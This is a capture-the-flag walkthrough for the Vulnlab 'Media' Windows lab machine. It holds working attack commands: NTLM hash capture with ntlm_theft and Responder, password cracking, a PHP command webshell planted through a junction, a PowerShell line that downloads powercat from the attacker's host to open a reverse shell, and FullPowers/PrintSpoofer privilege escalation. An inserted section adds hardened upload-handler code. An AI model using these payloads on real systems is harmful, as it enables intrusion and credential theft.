Vulnlab – Media

In this walkthrough, we will be going through the Media room from Vulnlab. This room is rated Medium on the platform. It consists of abusing a file upload functionality by creating documents that capture a user's NTLM hash; cracking that hash gives us initial access to the target. For privilege escalation, we abuse junctions (symlinks) to upload a webshell to the web root, which gives us access as NT AUTHORITY\LOCAL SERVICE. Finally, we use the FullPowers exploit along with PrintSpoofer to get SYSTEM on the target. So, let's get started without any delay.

Media

Machine Info:

Title: Media
IP address: 10.10.76.57
Difficulty: Medium
OS: Windows
Description: Media is a Medium-rated Windows machine that requires abusing a file upload functionality by creating documents that capture a user's NTLM hash; cracking that hash gives us initial access to the target. For privilege escalation, junctions (symlinks) have to be abused to upload a webshell to the web root, which gives access as NT AUTHORITY\LOCAL SERVICE. Finally, the FullPowers exploit is used along with PrintSpoofer to get SYSTEM on the target.

Enumeration:

  • I started off with a regular nmap scan along with a full TCP port scan. Found three open ports – 22 (SSH), 80 (HTTP) and 3389 (RDP).

$ sudo nmap -sV -sC 10.10.76.57

Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:18 IST

Nmap scan report for 10.10.76.57
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 0b:b3:c0:80:40:88:e1:ae:aa:3b:5f:f4:c2:23:c0:0d (RSA)
|   256 e0:80:3f:dd:b1:f8:fc:83:f5:de:d5:b3:2d:5a:4b:39 (ECDSA)
|_  256 b5:32:c0:72:18:10:0f:24:5d:f8:e1:ce:2a:73:5c:1f (ED25519)
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: ProMotion Studio
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MEDIA
|   NetBIOS_Domain_Name: MEDIA
|   NetBIOS_Computer_Name: MEDIA
|   DNS_Domain_Name: MEDIA
|   DNS_Computer_Name: MEDIA
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-22T11:49:20+00:00
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2024-04-21T11:45:58
|_Not valid after:  2024-10-21T11:45:58
|_ssl-date: 2024-04-22T11:49:26+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.55 seconds

$ sudo nmap -p- -T5 10.10.76.57

Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:19 IST

Nmap scan report for 10.10.76.57
Host is up (0.20s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 292.96 seconds

PORT 80 (HTTP)

  • The web server on port 80 hosts a static website for a design studio.

Studio website page

  • The About section lists some names of potential employees.

Team

  • Found a file upload functionality. According to its description, it accepts video files for HR. We can abuse it later to get a reverse shell on the target.

File upload functionality

  • Fired gobuster at the target to reveal hidden directories, especially one that we could use to reach our uploaded files, but didn't find any.

$ gobuster dir -u http://10.10.76.57/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.76.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
2024/04/22 17:35:26 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 332] [--> http://10.10.76.57/js/]
/css                  (Status: 301) [Size: 333] [--> http://10.10.76.57/css/]
/assets               (Status: 301) [Size: 336] [--> http://10.10.76.57/assets/]
/webalizer            (Status: 403) [Size: 420]                                 
/phpmyadmin           (Status: 403) [Size: 420]                                 
/examples             (Status: 503) [Size: 401]                                 
/licenses             (Status: 403) [Size: 420]                                 
/server-status        (Status: 403) [Size: 420]                                 
/con                  (Status: 403) [Size: 301]                                 
/con.asp              (Status: 403) [Size: 301]                                 
/con.aspx             (Status: 403) [Size: 301]                                 
/aux                  (Status: 403) [Size: 301]                                 
/aux.aspx             (Status: 403) [Size: 301]                                 
/aux.asp              (Status: 403) [Size: 301]                                 
                                                                                
===============================================================
2024/04/22 17:53:10 Finished
===============================================================

Exploitation:

  • Since the file upload functionality expects a media file, I created one with the ntlm_theft script. If all goes well and the user opens our media file, we will be able to capture their NetNTLMv2 hash with Responder.

python3 ntlm_theft.py -g wax -s 10.8.2.6 --filename media

creating files with ntlm_theft.py

  • As I suspected, we got the hash of the user "enox" and then cracked it using john.

sudo python3 Responder.py -I tun0

captured hash with Responder

enox::MEDIA:66ce4d0cf1dfba…

sudo john --wordlist=/usr/share/wordlists/rockyou.txt enox.hash

cracking the hash

  • Logged into the machine via SSH with enox creds and captured the local flag.

got initial access

Privilege Escalation:

  • Looked around the file system and found the source directory of the application. Peeking inside the index.php file reveals some really interesting information.

htdocs directory

<?php
error_reporting(0);

// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
    $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
    $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
    $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

    // Create a folder name using the MD5 hash of Firstname + Lastname + Email
    $folderName = md5($firstname . $lastname . $email);

    // Create the full upload directory path
    $targetDir = $uploadDir . $folderName . '/';

    // Ensure the directory exists; create it if not
    if (!file_exists($targetDir)) {
        mkdir($targetDir, 0777, true);
    }

    // Sanitize the filename to remove unsafe characters
    $originalFilename = $_FILES["fileToUpload"]["name"];
    $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);

    // Build the full path to the target file
    $targetFile = $targetDir . $sanitizedFilename;

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
        echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

        // Update the todo.txt file
        $todoFile = $uploadDir . 'todo.txt';
        $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

        // Append the new line to the file
        file_put_contents($todoFile, $todoContent, FILE_APPEND);
    } else {
        echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
    }
}
?>

  • We now know that uploads from the application are stored under "C:/Windows/Tasks/Uploads/", and that the folder name is the MD5 hash of the first name, last name and email entered in the upload form. Since all three values are attacker-controlled, the folder name is fully predictable. Note also that the filename filter only strips characters; it does not restrict the extension, so a .php file is accepted.

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

  • I created a shell.php file with the following web shell contents.

<?php
echo system($_GET['c']);
?>

  • Since we know how the upload folder name is derived, we can predict our upload folder beforehand. I quickly calculated the MD5 hash of the concatenated firstname, lastname and email.

echo -n "[email protected]" | md5sum

50246ad7e7c5f6c75808fe08f5dfcb6e 

creating md5 hash of target email

  • We can use symlinks or junctions to abuse this. First we create the directory we have predicted, then delete it and replace it with a junction pointing at the root of the application, C:\xampp\htdocs. After that, our upload lands in the web root, so we can request our webshell directly and get command execution.

# Creating and removing our predicted directory

mkdir 50246ad7e7c5f6c75808fe08f5dfcb6e

rmdir 50246ad7e7c5f6c75808fe08f5dfcb6e

# Creating symlink

mklink /J C:\Windows\Tasks\Uploads\50246ad7e7c5f6c75808fe08f5dfcb6e C:\xampp\htdocs\

creating symlinks
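The two weaknesses this walkthrough chains together are both in the upload handler: the folder name is the MD5 of attacker-supplied form fields (the "predict the folder" step above), and nothing checks that the directory the file is written to still resolves to a location under the base upload path (the junction step above). As an added example, not code from the Vulnlab machine or from the walkthrough author, here is a hardened replacement for that handler. The function names, the extension and MIME allowlists, and the reliance on `realpath()` resolving Windows junctions are my assumptions; verify the last one on the PHP build in use.

```php
<?php
// Added example, not the target machine's code. Hardened replacement for the
// upload handler shown in index.php. Assumptions: uploads must stay under
// UPLOAD_BASE, only a few video types are acceptable, and realpath() resolves
// junctions (check this on the PHP build in use).
declare(strict_types=1);

const UPLOAD_BASE  = 'C:/Windows/Tasks/Uploads/';
const ALLOWED_EXT  = ['mp4', 'mov', 'webm'];
const ALLOWED_MIME = ['video/mp4', 'video/quicktime', 'video/webm'];
const MAX_BYTES    = 200 * 1024 * 1024;

// Random, unguessable folder name instead of md5(firstname . lastname . email).
function newUploadFolder(): string {
    return bin2hex(random_bytes(16));
}

// Keep only the base name, drop anything outside [A-Za-z0-9._-], and enforce
// an extension allowlist. The original code stripped characters but never
// looked at the extension, which is why shell.php was accepted.
function safeFilename(string $original): ?string {
    $clean = preg_replace('/[^A-Za-z0-9._-]/', '', basename($original));
    if ($clean === '' || $clean[0] === '.' || substr_count($clean, '.') !== 1) {
        return null; // empty, hidden, or double-extension names are refused
    }
    $ext = strtolower(pathinfo($clean, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $clean : null;
}

// Refuse to write anywhere the resolved directory is not inside the base.
// If $dir were a junction to C:\xampp\htdocs, realpath() would return the
// htdocs path and this check would fail, stopping the redirect trick.
function isContained(string $dir, string $base): bool {
    $realDir  = realpath($dir);
    $realBase = realpath($base);
    if ($realDir === false || $realBase === false) {
        return false;
    }
    $realBase = rtrim($realBase, '/\\') . DIRECTORY_SEPARATOR;
    return strncmp($realDir . DIRECTORY_SEPARATOR, $realBase, strlen($realBase)) === 0;
}

function handleUpload(array $file): string {
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        return 'Upload rejected.';
    }
    $name = safeFilename($file['name']);
    if ($name === null) {
        return 'Only video files are accepted.';
    }
    // Check the actual content, not the client-supplied Content-Type.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return 'Only video files are accepted.';
    }
    $dir = UPLOAD_BASE . newUploadFolder() . '/';
    // mkdir fails if the name already exists; is_dir() is true for a junction,
    // so we fall through to the containment check rather than trusting it.
    if (!mkdir($dir, 0700, true) && !is_dir($dir)) {
        return 'Upload failed.';
    }
    if (!isContained($dir, UPLOAD_BASE)) {
        return 'Upload failed.';
    }
    if (!move_uploaded_file($file['tmp_name'], $dir . $name)) {
        return 'Upload failed.';
    }
    return 'Submitted.';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['fileToUpload'])) {
    echo htmlspecialchars(handleUpload($_FILES['fileToUpload']), ENT_QUOTES, 'UTF-8');
}
```

The random folder name removes the ability to pre-create the directory, and the containment check catches the case where a junction is planted anyway. Neither replaces fixing the directory ACLs: in this room the upload base is writable by the low-privileged SSH user, which is what lets the junction be created in the first place.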

  • Uploading the shell.php webshell with the first name, last name and email values we used to compute the hash.

uploading shell.php

shell uploaded

  • Got our webshell working as NT AUTHORITY\LOCAL SERVICE. Let's upgrade it to a full reverse shell with powercat.

got access as nt authority\local service

Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.8.2.6:8000/powercat.ps1');powercat -c 10.8.2.6 -p 445 -e cmd

got access as nt authority\local service

  • Now that we have access to the target as LOCAL SERVICE, we can use the FullPowers exploit to recover the default privilege set of the service account, which includes SeImpersonatePrivilege.

Exploit (FullPowers): https://github.com/itm4n/FullPowers.git

Exploit (PrintSpoofer): https://github.com/itm4n/PrintSpoofer/releases

Firing FullPowers.exe

Enabled the privileges

  • We can now abuse the enabled SeImpersonatePrivilege using the PrintSpoofer exploit to get a shell as NT AUTHORITY\SYSTEM.

PrintSpoofer.exe -i -c cmd

got root


Conclusion:


So that was "Media" for you. We started off with a regular nmap scan and found three open ports – 22 (SSH), 80 (HTTP) and 3389 (RDP). We enumerated the web server on port 80 and found a file upload functionality. We abused it by creating documents with the ntlm_theft script to capture a user's NTLM hash; cracking it gave us initial access to the target. For privilege escalation, we abused a junction to upload a webshell into the web root, which gave us access as NT AUTHORITY\LOCAL SERVICE. Finally, we used the FullPowers exploit along with PrintSpoofer to get SYSTEM on the target. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
